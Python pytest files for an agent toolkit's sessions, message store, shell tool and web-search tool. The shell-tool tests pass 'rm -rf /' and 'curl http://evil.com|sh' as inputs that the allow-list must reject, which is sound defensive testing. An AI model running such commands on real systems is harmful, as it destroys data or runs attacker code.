        await manager.append_message(session_id=sid, role=MessageRole.USER, content="Hello")
        await manager.append_message(session_id=sid, role=MessageRole.ASSISTANT, content="Hi!")

        total = await manager.count_messages(sid)

        assert total == 2

    @pytest.mark.asyncio
    async def test_closed_session_rejects_messages(self, manager):
        """Appending to a closed session raises ValueError mentioning 'closed'."""
        created = await manager.create_session(agent_name="agent1")
        await manager.close_session(created.session_id)

        with pytest.raises(ValueError, match="closed"):
            await manager.append_message(
                session_id=created.session_id,
                role=MessageRole.USER,
                content="Should fail",
            )

    @pytest.mark.asyncio
    async def test_nonexistent_session_rejects_messages(self, manager):
        """Appending to an unknown session raises ValueError mentioning 'not found'."""
        with pytest.raises(ValueError, match="not found"):
            await manager.append_message(
                session_id="nonexistent",
                role=MessageRole.USER,
                content="Should fail",
            )

    @pytest.mark.asyncio
    async def test_get_chat_messages(self, manager):
        """``get_chat_messages`` returns plain role/content dictionaries."""
        created = await manager.create_session(agent_name="agent1")
        sid = created.session_id
        await manager.append_message(session_id=sid, role=MessageRole.USER, content="Hello")
        await manager.append_message(session_id=sid, role=MessageRole.ASSISTANT, content="Hi!")

        transcript = await manager.get_chat_messages(sid)

        assert len(transcript) == 2
        assert transcript[0] == {"role": "user", "content": "Hello"}
        assert transcript[1] == {"role": "assistant", "content": "Hi!"}
class TestSessionManagerList:
    """Listing sessions, with and without an agent-name filter."""

    @pytest.mark.asyncio
    async def test_list_sessions(self, manager):
        """Without a filter, every created session is listed."""
        await manager.create_session(agent_name="agent1")
        await manager.create_session(agent_name="agent2")

        listed = await manager.list_sessions()

        assert len(listed) == 2

    @pytest.mark.asyncio
    async def test_list_sessions_by_agent(self, manager):
        """Filtering by agent name returns only that agent's sessions."""
        await manager.create_session(agent_name="agent1")
        await manager.create_session(agent_name="agent2")
        await manager.create_session(agent_name="agent1")

        listed = await manager.list_sessions(agent_name="agent1")

        assert len(listed) == 2
        assert all(entry.agent_name == "agent1" for entry in listed)
class TestSessionManagerHealth:
    """Health reporting of a SessionManager on the in-memory store."""

    @pytest.mark.asyncio
    async def test_health_check(self, manager):
        """``health_check`` returns True for the fixture-provided manager."""
        healthy = await manager.health_check()
        assert healthy is True

View File

@ -0,0 +1,146 @@
"""Tests for Session and Message data models."""
import pytest
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
class TestSessionStatus:
    """String values of the SessionStatus enumeration."""

    def test_status_values(self):
        """Each member compares equal to its lowercase string value."""
        assert SessionStatus.ACTIVE == "active"
        assert SessionStatus.PAUSED == "paused"
        assert SessionStatus.CLOSED == "closed"

    def test_status_from_string(self):
        """Constructing from the string value returns the matching member."""
        assert SessionStatus("active") == SessionStatus.ACTIVE
        assert SessionStatus("paused") == SessionStatus.PAUSED
        assert SessionStatus("closed") == SessionStatus.CLOSED
class TestMessageRole:
    """String values of the MessageRole enumeration."""

    def test_role_values(self):
        """Each role compares equal to its lowercase string value."""
        assert MessageRole.SYSTEM == "system"
        assert MessageRole.USER == "user"
        assert MessageRole.ASSISTANT == "assistant"
        assert MessageRole.TOOL == "tool"
class TestSession:
    """Construction, serialisation and id generation of the Session model."""

    def test_create_session(self):
        """A minimal Session defaults to ACTIVE, empty metadata and set timestamps."""
        created = Session(session_id="s1", agent_name="test-agent")

        assert created.session_id == "s1"
        assert created.agent_name == "test-agent"
        assert created.status == SessionStatus.ACTIVE
        assert created.metadata == {}
        assert created.created_at is not None
        assert created.updated_at is not None

    def test_session_to_dict_and_back(self):
        """``to_dict`` followed by ``from_dict`` preserves the checked fields."""
        source = Session(
            session_id="s1",
            agent_name="agent1",
            status=SessionStatus.PAUSED,
            metadata={"key": "value"},
        )

        as_dict = source.to_dict()
        assert as_dict["session_id"] == "s1"
        assert as_dict["agent_name"] == "agent1"
        assert as_dict["status"] == "paused"
        assert as_dict["metadata"] == {"key": "value"}

        rebuilt = Session.from_dict(as_dict)
        assert rebuilt.session_id == source.session_id
        assert rebuilt.agent_name == source.agent_name
        assert rebuilt.status == source.status
        assert rebuilt.metadata == source.metadata

    def test_new_session_id_is_unique(self):
        """One hundred generated session ids are all distinct."""
        generated = {Session.new_session_id() for _ in range(100)}
        assert len(generated) == 100

    def test_new_message_id_is_unique(self):
        """One hundred generated message ids are all distinct."""
        generated = {Session.new_message_id() for _ in range(100)}
        assert len(generated) == 100
class TestMessage:
    """Construction, serialisation and chat-format conversion of Message."""

    def test_create_message(self):
        """A minimal Message keeps its fields and defaults the optional ones."""
        created = Message(
            message_id="m1",
            session_id="s1",
            role=MessageRole.USER,
            content="Hello",
        )

        assert created.message_id == "m1"
        assert created.session_id == "s1"
        assert created.role == MessageRole.USER
        assert created.content == "Hello"
        assert created.tool_call_id is None
        assert created.agent_name is None
        assert created.metadata == {}

    def test_message_with_tool_call(self):
        """``tool_call_id`` and ``agent_name`` are stored when supplied."""
        created = Message(
            message_id="m1",
            session_id="s1",
            role=MessageRole.TOOL,
            content="result",
            tool_call_id="tc1",
            agent_name="agent1",
        )

        assert created.tool_call_id == "tc1"
        assert created.agent_name == "agent1"

    def test_message_to_dict_and_back(self):
        """``to_dict`` followed by ``from_dict`` preserves the checked fields."""
        source = Message(
            message_id="m1",
            session_id="s1",
            role=MessageRole.ASSISTANT,
            content="Hi there",
            tool_call_id="tc1",
            agent_name="agent1",
            metadata={"step": 1},
        )

        as_dict = source.to_dict()
        assert as_dict["message_id"] == "m1"
        assert as_dict["role"] == "assistant"
        assert as_dict["tool_call_id"] == "tc1"

        rebuilt = Message.from_dict(as_dict)
        assert rebuilt.message_id == source.message_id
        assert rebuilt.role == source.role
        assert rebuilt.content == source.content
        assert rebuilt.tool_call_id == source.tool_call_id
        assert rebuilt.agent_name == source.agent_name
        assert rebuilt.metadata == source.metadata

    def test_to_chat_message_user(self):
        """A user message converts to a role/content dictionary."""
        source = Message(
            message_id="m1",
            session_id="s1",
            role=MessageRole.USER,
            content="Hello",
        )

        converted = source.to_chat_message()

        assert converted == {"role": "user", "content": "Hello"}

    def test_to_chat_message_tool(self):
        """A tool message additionally carries its ``tool_call_id``."""
        source = Message(
            message_id="m1",
            session_id="s1",
            role=MessageRole.TOOL,
            content="result",
            tool_call_id="tc1",
        )

        converted = source.to_chat_message()

        assert converted == {"role": "tool", "content": "result", "tool_call_id": "tc1"}

    def test_to_chat_message_no_tool_call_id(self):
        """Without a tool_call_id the key is absent from the chat dictionary."""
        source = Message(
            message_id="m1",
            session_id="s1",
            role=MessageRole.ASSISTANT,
            content="Hi",
        )

        converted = source.to_chat_message()

        assert "tool_call_id" not in converted

View File

@ -0,0 +1,157 @@
"""Tests for InMemorySessionStore."""
import pytest
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
from agentkit.session.store import InMemorySessionStore
@pytest.fixture
def store():
    """Provide a new InMemorySessionStore built with default arguments."""
    fresh_store = InMemorySessionStore()
    return fresh_store
async def _create_session(store, session_id="s1", agent_name="agent1"):
    """Build a Session, save it into *store* and return it."""
    new_session = Session(session_id=session_id, agent_name=agent_name)
    await store.save_session(new_session)
    return new_session
async def _create_message(store, session_id, role=MessageRole.USER, content="Hello"):
    """Build a Message with a generated id, append it to *store* and return it."""
    generated_id = Session.new_message_id()
    new_message = Message(
        message_id=generated_id,
        session_id=session_id,
        role=role,
        content=content,
    )
    await store.append_message(new_message)
    return new_message
class TestInMemorySessionStoreCRUD:
    """Save, fetch, status-update, delete and list operations on the store."""

    @pytest.mark.asyncio
    async def test_save_and_get(self, store):
        """A saved session can be fetched back by id."""
        await _create_session(store)

        loaded = await store.get_session("s1")

        assert loaded is not None
        assert loaded.session_id == "s1"

    @pytest.mark.asyncio
    async def test_get_nonexistent(self, store):
        """Fetching an unknown id returns None."""
        loaded = await store.get_session("nonexistent")
        assert loaded is None

    @pytest.mark.asyncio
    async def test_update_status(self, store):
        """Updating the status returns the session with the new status."""
        await _create_session(store)

        changed = await store.update_session_status("s1", SessionStatus.PAUSED)

        assert changed is not None
        assert changed.status == SessionStatus.PAUSED

    @pytest.mark.asyncio
    async def test_update_status_nonexistent(self, store):
        """Updating the status of an unknown id returns None."""
        changed = await store.update_session_status("nonexistent", SessionStatus.PAUSED)
        assert changed is None

    @pytest.mark.asyncio
    async def test_delete(self, store):
        """Deleting returns True and the session is gone afterwards."""
        await _create_session(store)

        removed = await store.delete_session("s1")

        assert removed is True
        assert await store.get_session("s1") is None

    @pytest.mark.asyncio
    async def test_delete_nonexistent(self, store):
        """Deleting an unknown id returns False."""
        removed = await store.delete_session("nonexistent")
        assert removed is False

    @pytest.mark.asyncio
    async def test_list_sessions(self, store):
        """Without a filter, all saved sessions are listed."""
        await _create_session(store, "s1", "agent1")
        await _create_session(store, "s2", "agent2")

        listed = await store.list_sessions()

        assert len(listed) == 2

    @pytest.mark.asyncio
    async def test_list_sessions_by_agent(self, store):
        """Filtering by agent name returns only the matching session."""
        await _create_session(store, "s1", "agent1")
        await _create_session(store, "s2", "agent2")

        listed = await store.list_sessions(agent_name="agent1")

        assert len(listed) == 1
        assert listed[0].agent_name == "agent1"
class TestInMemorySessionStoreMessages:
    """Message append, paging, counting and cleanup on the in-memory store."""

    @pytest.mark.asyncio
    async def test_append_and_get(self, store):
        """Appended messages are returned in insertion order."""
        await _create_session(store)
        await _create_message(store, "s1", content="Hello")
        await _create_message(store, "s1", content="World")

        history = await store.get_messages("s1")

        assert len(history) == 2
        assert history[0].content == "Hello"
        assert history[1].content == "World"

    @pytest.mark.asyncio
    async def test_get_messages_pagination(self, store):
        """``limit=2, offset=1`` returns the second and third messages."""
        await _create_session(store)
        for index in range(5):
            await _create_message(store, "s1", content=f"Msg {index}")

        window = await store.get_messages("s1", limit=2, offset=1)

        assert len(window) == 2
        assert window[0].content == "Msg 1"
        assert window[1].content == "Msg 2"

    @pytest.mark.asyncio
    async def test_count_messages(self, store):
        """The count equals the number of appended messages."""
        await _create_session(store)
        await _create_message(store, "s1")
        await _create_message(store, "s1")

        total = await store.count_messages("s1")

        assert total == 2

    @pytest.mark.asyncio
    async def test_count_messages_empty_session(self, store):
        """Counting messages for an unknown session id gives 0."""
        total = await store.count_messages("nonexistent")
        assert total == 0

    @pytest.mark.asyncio
    async def test_get_messages_empty_session(self, store):
        """Reading messages for an unknown session id gives an empty list."""
        history = await store.get_messages("nonexistent")
        assert history == []

    @pytest.mark.asyncio
    async def test_delete_session_removes_messages(self, store):
        """After deleting a session its message count is 0."""
        await _create_session(store)
        await _create_message(store, "s1")

        await store.delete_session("s1")

        total = await store.count_messages("s1")
        assert total == 0
class TestInMemorySessionStoreEviction:
    """Behaviour of the store when ``max_sessions`` is reached."""

    @pytest.mark.asyncio
    async def test_evict_closed_session_on_full(self):
        """Saving into a full store evicts the closed session and keeps the rest."""
        bounded = InMemorySessionStore(max_sessions=2)
        await _create_session(bounded, "s1")
        await _create_session(bounded, "s2")
        # Mark s1 as CLOSED so that it is eligible for eviction.
        await bounded.update_session_status("s1", SessionStatus.CLOSED)

        # A third save exceeds the limit of two and should push s1 out.
        await _create_session(bounded, "s3")

        assert await bounded.get_session("s1") is None
        assert await bounded.get_session("s2") is not None
        assert await bounded.get_session("s3") is not None

    @pytest.mark.asyncio
    async def test_full_no_closed_raises(self):
        """Saving into a full store with no closed session raises RuntimeError."""
        bounded = InMemorySessionStore(max_sessions=2)
        await _create_session(bounded, "s1")
        await _create_session(bounded, "s2")

        with pytest.raises(RuntimeError, match="full"):
            await _create_session(bounded, "s3")
class TestInMemorySessionStoreHealth:
    """Health reporting of the in-memory store."""

    @pytest.mark.asyncio
    async def test_health_check(self, store):
        """``health_check`` returns True for a fresh store."""
        healthy = await store.health_check()
        assert healthy is True

View File

@ -0,0 +1,155 @@
"""Unit tests for ShellTool — command execution with safety controls."""
import asyncio
import pytest
from agentkit.tools.shell import ShellTool, DEFAULT_ALLOWED_COMMANDS, BLOCKED_PATTERNS
class TestShellToolSchema:
    """Shape of ShellTool's input and output schemas."""

    def test_input_schema_has_required_fields(self):
        """Input schema declares command/timeout/working_dir and requires command."""
        input_schema = ShellTool().input_schema
        declared = input_schema["properties"]

        assert "command" in declared
        assert "command" in input_schema["required"]
        assert "timeout" in declared
        assert "working_dir" in declared

    def test_output_schema_has_required_fields(self):
        """Output schema declares stdout, stderr, exit_code and success."""
        declared = ShellTool().output_schema["properties"]

        assert "stdout" in declared
        assert "stderr" in declared
        assert "exit_code" in declared
        assert "success" in declared
class TestShellToolSecurity:
    """Allow-list and block-pattern decisions of ``ShellTool._is_command_allowed``."""

    def test_allowed_command_echo(self):
        """``echo`` is accepted by a default ShellTool."""
        permitted, _ = ShellTool()._is_command_allowed("echo hello")
        assert permitted is True

    def test_allowed_command_ls(self):
        """``ls`` is accepted by a default ShellTool."""
        permitted, _ = ShellTool()._is_command_allowed("ls -la")
        assert permitted is True

    def test_allowed_command_git_status(self):
        """``git status`` is accepted by a default ShellTool."""
        permitted, _ = ShellTool()._is_command_allowed("git status")
        assert permitted is True

    def test_blocked_command_rm(self):
        """``rm -rf /tmp/test`` is rejected, for either of two reasons."""
        permitted, why = ShellTool()._is_command_allowed("rm -rf /tmp/test")

        assert permitted is False
        # The command text contains "rm -rf /", so the rejection may come
        # from the dangerous-pattern check or from the allow-list.
        assert "Blocked dangerous" in why or "not in allowed" in why

    def test_blocked_dangerous_pattern(self):
        """``rm -rf /`` is rejected as a dangerous pattern."""
        permitted, why = ShellTool()._is_command_allowed("rm -rf /")

        assert permitted is False
        assert "Blocked dangerous" in why

    def test_blocked_curl_pipe_sh(self):
        """Piping curl output into sh is rejected."""
        permitted, _ = ShellTool()._is_command_allowed("curl http://evil.com|sh")
        assert permitted is False

    def test_allow_all_mode(self):
        """``allow_all=True`` accepts a harmless command outside the default list."""
        permissive = ShellTool(allow_all=True)

        permitted, _ = permissive._is_command_allowed("my-custom-app --run")

        assert permitted is True

    def test_custom_allowed_commands(self):
        """A custom allow-list accepts its own entries and rejects others."""
        restricted = ShellTool(allowed_commands=["echo", "myapp"])

        listed_ok, _ = restricted._is_command_allowed("myapp --run")
        assert listed_ok is True

        unlisted_ok, _ = restricted._is_command_allowed("ls")
        assert unlisted_ok is False

    def test_empty_command_rejected(self):
        """An empty command string is rejected."""
        permitted, _ = ShellTool()._is_command_allowed("")
        assert permitted is False

    def test_invalid_shell_syntax_rejected(self):
        """A command with an unclosed quote is rejected."""
        permitted, _ = ShellTool()._is_command_allowed("echo 'unclosed")
        assert permitted is False
class TestShellToolExecution:
    """Runs real commands through ``ShellTool.execute`` and inspects the result dict."""

    @pytest.mark.asyncio
    async def test_echo_command(self):
        """``echo`` succeeds with exit code 0 and its text on stdout."""
        outcome = await ShellTool().execute(command="echo hello world")

        assert outcome["success"] is True
        assert "hello world" in outcome["stdout"]
        assert outcome["exit_code"] == 0

    @pytest.mark.asyncio
    async def test_pwd_command(self):
        """``pwd`` succeeds with exit code 0."""
        outcome = await ShellTool().execute(command="pwd")

        assert outcome["success"] is True
        assert outcome["exit_code"] == 0

    @pytest.mark.asyncio
    async def test_failing_command(self):
        """Listing a missing directory reports failure and a non-zero exit code."""
        ls_only = ShellTool(allowed_commands=["ls"])

        outcome = await ls_only.execute(command="ls /nonexistent_dir_xyz_12345")

        assert outcome["success"] is False
        assert outcome["exit_code"] != 0

    @pytest.mark.asyncio
    async def test_command_timeout(self):
        """A 10-second sleep under a 1-second timeout is reported as timed out."""
        sleeper = ShellTool(allowed_commands=["sleep"], default_timeout=1)

        outcome = await sleeper.execute(command="sleep 10", timeout=1)

        assert outcome["success"] is False
        assert outcome["timed_out"] is True

    @pytest.mark.asyncio
    async def test_missing_command_param(self):
        """Calling ``execute`` without a command fails with an error naming it."""
        outcome = await ShellTool().execute()

        assert outcome["success"] is False
        assert "command" in outcome["error"]

    @pytest.mark.asyncio
    async def test_blocked_command_returns_error(self):
        """A rejected command yields an error containing 'not allowed'."""
        outcome = await ShellTool().execute(command="rm -rf /tmp/test")

        assert outcome["success"] is False
        assert "not allowed" in outcome["error"]

    @pytest.mark.asyncio
    async def test_working_dir(self):
        """With ``working_dir='/tmp'`` the output of ``pwd`` contains '/tmp'."""
        in_tmp = ShellTool(working_dir="/tmp")

        outcome = await in_tmp.execute(command="pwd")

        assert outcome["success"] is True
        assert "/tmp" in outcome["stdout"]

    @pytest.mark.asyncio
    async def test_output_truncation(self):
        """Output longer than ``max_output_length`` is shortened and flagged."""
        capped = ShellTool(max_output_length=50, allowed_commands=["python3"])

        # The child process prints 1000 characters, far above the 50 limit.
        outcome = await capped.execute(command="python3 -c \"print('x' * 1000)\"")

        assert outcome["success"] is True
        assert len(outcome["stdout"]) < 200  # truncated text plus a notice
        assert "truncated" in outcome.get("stdout", "") or outcome.get("truncated") is True

    @pytest.mark.asyncio
    async def test_stderr_captured(self):
        """Text written to stderr by the child appears in the 'stderr' field."""
        py_only = ShellTool(allowed_commands=["python3"])

        outcome = await py_only.execute(command="python3 -c \"import sys; print('error', file=sys.stderr)\"")

        assert "error" in outcome["stderr"]

View File

@ -0,0 +1,172 @@
"""Unit tests for WebSearchTool — multi-backend web search."""
import pytest
from unittest.mock import AsyncMock, patch, MagicMock
from agentkit.tools.web_search import WebSearchTool
class TestWebSearchToolSchema:
    """Test schema definitions."""

    def test_input_schema_has_required_fields(self):
        """Input schema declares query/max_results and requires query."""
        tool = WebSearchTool()
        schema = tool.input_schema
        assert "query" in schema["properties"]
        assert "query" in schema["required"]
        assert "max_results" in schema["properties"]

    def test_output_schema_has_required_fields(self):
        """Output schema declares results, total, backend and success."""
        tool = WebSearchTool()
        schema = tool.output_schema
        assert "results" in schema["properties"]
        assert "total" in schema["properties"]
        # This line was previously a bare expression without ``assert``, so
        # the presence of "backend" was never actually verified.
        assert "backend" in schema["properties"]
        assert "success" in schema["properties"]
class TestWebSearchToolValidation:
    """Input validation performed by WebSearchTool.execute()."""

    @pytest.mark.asyncio
    async def test_missing_query(self):
        """Omitting `query` fails with an error that mentions "query"."""
        outcome = await WebSearchTool().execute()

        assert outcome["success"] is False
        assert "query" in outcome["error"]

    @pytest.mark.asyncio
    async def test_empty_query(self):
        """An empty-string query is reported as a failure."""
        outcome = await WebSearchTool().execute(query="")

        assert outcome["success"] is False
class TestWebSearchToolDuckDuckGo:
    """Parsing of DuckDuckGo HTML by WebSearchTool._parse_duckduckgo_html."""

    def test_parse_html_with_results(self):
        """Two link/snippet pairs produce two results; the first is checked field by field."""
        page = """
<html><body>
<a class="result-link" href="https://example.com/result1">Result 1 Title</a>
<td class="result-snippet">Snippet for result 1</td>
<a class="result-link" href="https://example.com/result2">Result 2 Title</a>
<td class="result-snippet">Snippet for result 2</td>
</body></html>
"""
        parsed = WebSearchTool._parse_duckduckgo_html(page, 5)

        assert len(parsed) == 2
        first = parsed[0]
        assert first["title"] == "Result 1 Title"
        assert first["url"] == "https://example.com/result1"
        assert first["snippet"] == "Snippet for result 1"

    def test_parse_html_empty(self):
        """A page without any result markup parses to an empty list."""
        parsed = WebSearchTool._parse_duckduckgo_html("<html></html>", 5)

        assert parsed == []

    def test_parse_html_skips_duckduckgo_links(self):
        """A link pointing at duckduckgo.com is dropped; the external one is kept."""
        page = """
<a class="result-link" href="https://duckduckgo.com/internal">Internal</a>
<a class="result-link" href="https://example.com/good">Good Result</a>
<td class="result-snippet">Good snippet</td>
"""
        parsed = WebSearchTool._parse_duckduckgo_html(page, 5)

        assert len(parsed) == 1
        assert parsed[0]["url"] == "https://example.com/good"

    def test_parse_html_max_results(self):
        """With ten results in the page and a limit of 3, exactly three are returned."""
        page = "".join(
            f'<a class="result-link" href="https://example.com/{i}">Title {i}</a>\n'
            f'<td class="result-snippet">Snippet {i}</td>\n'
            for i in range(10)
        )
        parsed = WebSearchTool._parse_duckduckgo_html(page, 3)

        assert len(parsed) == 3
class TestWebSearchToolTavily:
    """Behaviour of the Tavily backend and the fallback when it fails."""

    @pytest.mark.asyncio
    async def test_tavily_success(self):
        """With a Tavily key and a mocked HTTP client, one result comes back from "tavily"."""
        searcher = WebSearchTool(tavily_api_key="test-key")

        # Canned HTTP response carrying a single Tavily-style hit.
        fake_response = MagicMock()
        fake_response.json.return_value = {
            "results": [
                {"title": "Test", "url": "https://example.com", "content": "Test content"},
            ]
        }
        fake_response.raise_for_status = MagicMock()

        # Client double usable as `async with httpx.AsyncClient(...) as client`.
        fake_client = AsyncMock()
        fake_client.post = AsyncMock(return_value=fake_response)
        fake_client.__aenter__ = AsyncMock(return_value=fake_client)
        fake_client.__aexit__ = AsyncMock(return_value=None)

        with patch("httpx.AsyncClient") as client_factory:
            client_factory.return_value = fake_client
            outcome = await searcher.execute(query="test query")

        assert outcome["success"] is True
        assert outcome["backend"] == "tavily"
        assert len(outcome["results"]) == 1

    @pytest.mark.asyncio
    async def test_tavily_failure_falls_back(self):
        """When _search_tavily reports failure, the result comes from DuckDuckGo."""
        searcher = WebSearchTool(tavily_api_key="test-key")

        failing_tavily = patch.object(
            searcher,
            "_search_tavily",
            return_value={"success": False, "error": "API error", "results": [], "total": 0},
        )
        working_duckduckgo = patch.object(
            searcher,
            "_search_duckduckgo",
            return_value={"results": [], "total": 0, "backend": "duckduckgo", "success": True},
        )
        with failing_tavily, working_duckduckgo:
            outcome = await searcher.execute(query="test")

        assert outcome["backend"] == "duckduckgo"
class TestWebSearchToolSerper:
    """Behaviour of the Serper backend."""

    @pytest.mark.asyncio
    async def test_serper_success(self):
        """With a Serper key and a mocked HTTP client, one result comes back from "serper"."""
        searcher = WebSearchTool(serper_api_key="test-key")

        # Canned HTTP response carrying a single Serper-style organic hit.
        fake_response = MagicMock()
        fake_response.json.return_value = {
            "organic": [
                {"title": "Test", "link": "https://example.com", "snippet": "Test snippet"},
            ]
        }
        fake_response.raise_for_status = MagicMock()

        # Client double usable as `async with httpx.AsyncClient(...) as client`.
        fake_client = AsyncMock()
        fake_client.post = AsyncMock(return_value=fake_response)
        fake_client.__aenter__ = AsyncMock(return_value=fake_client)
        fake_client.__aexit__ = AsyncMock(return_value=None)

        with patch("httpx.AsyncClient") as client_factory:
            client_factory.return_value = fake_client
            outcome = await searcher.execute(query="test query")

        assert outcome["success"] is True
        assert outcome["backend"] == "serper"
        assert len(outcome["results"]) == 1
class TestWebSearchToolPriority:
    """Backend selection order and the fallback chain."""

    @pytest.mark.asyncio
    async def test_tavily_over_serper(self):
        """With both API keys configured, the Tavily backend is called once and answers."""
        searcher = WebSearchTool(tavily_api_key="t-key", serper_api_key="s-key")
        tavily_reply = {"results": [], "total": 0, "backend": "tavily", "success": True}

        with patch.object(searcher, "_search_tavily", return_value=tavily_reply) as tavily_spy:
            outcome = await searcher.execute(query="test")

        tavily_spy.assert_called_once()
        assert outcome["backend"] == "tavily"

    @pytest.mark.asyncio
    async def test_no_keys_uses_duckduckgo(self):
        """With no API keys configured, the DuckDuckGo backend is called once and answers."""
        searcher = WebSearchTool()
        duckduckgo_reply = {"results": [], "total": 0, "backend": "duckduckgo", "success": True}

        with patch.object(searcher, "_search_duckduckgo", return_value=duckduckgo_reply) as duckduckgo_spy:
            outcome = await searcher.execute(query="test")

        duckduckgo_spy.assert_called_once()
        assert outcome["backend"] == "duckduckgo"